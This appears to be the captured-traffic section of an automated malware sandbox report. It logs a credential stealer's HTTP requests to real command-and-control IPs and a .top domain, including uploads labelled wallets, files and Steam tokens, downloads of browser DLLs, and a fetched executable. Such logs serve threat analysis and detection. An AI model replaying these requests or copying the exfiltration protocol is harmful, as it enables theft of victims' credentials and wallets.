                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 39 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007917001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="file"------IJDGCAEBFIIECAKFHIJE--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------ECAFHIIJJECGDHIEGDAKContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------ECAFHIIJJECGDHIEGDAKContent-Disposition: form-data; name="message"wallets------ECAFHIIJJECGDHIEGDAK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="message"files------GDAAKKEHDHCAAAKFCBAK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 2d 2d 0d 0a Data Ascii: ------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="message"ybncbhylepme------HIEHDHCFIJDBFHJJDBFH--
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 29758Content-Type: multipart/form-data; boundary=------------------------rlvqMfj809HUgJEgKMJ9RJData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 6c 76 71 4d 66 6a 38 30 39 48 55 67 4a 45 67 4b 4d 4a 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 69 66 75 76 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b7 91 85 19 69 94 67 30 88 c0 8d 65 7c 56 d4 50 a9 8e a8 5c cb 55 c5 98 0f 88 ff 62 57 17 74 a8 58 2b 78 78 6b 61 1a f8 68 be 93 a3 a1 88 4c ff ab 82 09 dc 83 e9 d3 d4 12 bf 45 0f ec 7f 1f 4e 6b f1 95 cd e7 44 4c 33 41 29 9f e1 af 27 f1 63 4b 5d e4 d1 e8 6f e6 c7 7f dc d5 94 51 07 ba b4 a8 3e e0 28 e3 09 56 9d c0 e1 20 f0 19 cf 65 4a a7 ff 41 4f f6 9c 24 48 6e 3c 9b 15 8f 65 7d 62 1a f7 9f 70 d8 7e 3d 05 55 97 e1 02 1b dd ee 83 b6 ab 53 df ee 6e 1c a3 b3 25 a1 dd ab 0a a1 31 aa d6 42 d1 06 4d da 0c b7 e7 a5 12 28 04 18 8f ac d3 e2 d6 42 79 b4 51 37 f8 47 da 05 d8 01 1e 3f 29 de 2d 4a ca ae 74 2e 92 09 c2 f3 18 d8 61 29 4c 05 76 68 06 0c 62 5e 8e 86 a6 74 4e 9c 66 03 0c 69 81 86 b1 32 bd 3e 33 df 16 38 2b 21 38 a4 e6 c3 4e f1 30 a7 2f 09 1f 7e ad a1 8f eb 76 f6 f5 fb c8 33 fc 63 c6 e8 3b 3d 64 0d 83 b9 ea 73 25 22 e0 a5 06 ee f7 80 6e 04 bd 78 61 b9 7f 27 71 32 b6 62 eb 42 eb 0b 50 8a 07 6f d2 06 0e 68 c4 7c 80 35 8d cc e6 5f f8 6e da 59 c6 e0 cf 85 e7 67 56 56 9f 3c 84 a0 2b 4f ec 34 ab d2 74 f8 59 18 38 bf 2e ce d0 31 0c c6 be 9f ac 0f c8 c2 d0 f8 a6 43 93 c6 93 d6 23 81 6e 44 43 24 cb 1f 0f e5 b9 8e d1 d4 3b 4d 51 33 de 40 a6 52 46 70 90 29 f1 4a 6e 96 33 14 69 fe d9 cf 9b 23 de 44 08 53 5e d9 1a 5e 40 18 81 dc 32 b1 60 19 17 ea 75 9b 3a 70 4b 30 9f 8c 9b 02 10 41 f8 be 8f 3f 62 37 34 8f 7f 84 57 40 79 47 d6 33 2a 25 18 a0 a0 40 7a af 6e 1a b5 e5 fc 71 32 33 7e 29 63 59 86 e5 c4 9d 91 91 58 45 26 1f b6 82 dc 2f 32 19 b3 a6 6c fd 34 e8 22 58 92 54 1b 7f ad 23 89 02 52 e6 d5 1d 79 7a 0f a3 aa a4 c2 79 b7 07 8b 48 ca e8 98 d8 97 cb b3 bc ed 74 2a 76 54 ea 01 f3 1b 99 dc bf 13 85 3e 74 ac 1a 48 4f f1 4a 41 ae 4e 21 9a 24 37 2e 74 a0 d0 93 77 7d af 86 3c ab bb 05 f3 7f 24 d1 80 c0 61 79 c6 94 3f e7 8f 00 07 2d 79 5f 50 24 ef 99 4b 32 a3 4c 10 79 dd bb 56 7d ba 92 a5 02 1e a8 61 1f 82 8c ea ae 1d fe c7 63 54 f2 78 71 2a 67 f9 df 62 c6 2c 58 69 71 9d ca d0 94 65 9d a2 ce d8 d8 03 f1 54 28 0a 1e 22 a5 76 8e a4 00 a1 67 25 d0 8d 33 48 f0 a7 04 fc 73 7f e4 dd 2e eb c5 0b 82 c4 0a 7e ba 97 b3 4e da fd b3 13 f1 bd a2 3c 1e 17 c8 a9 46 43 49 61 4b db df 24 cf cd d6 91 2b 0a e4 fb 17 72 70 93 5b c7 4b bf 68 b3 3b 1a 51 9b 2a c3 a0 b2 64 b0 30 6a bf 98 9b e0 64 21 ac 3e 07 02 b8 ef 0d 92 f0 53 1c e0 a4 ef f7 fa a8 47 15 c2 8b c0 12 1f 63 1c ad 14 76 32 b0 f0 83 2e 5c d2 04 1c a7 5d 47 4d 1d 60 0a 99 84
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 2d 2d 0d 0a Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FIJDGIJJKEGIEBGCGDHC--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"84C3720B7228992247664------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"mars------EGDBFIIECBGDGDGDHCAK--
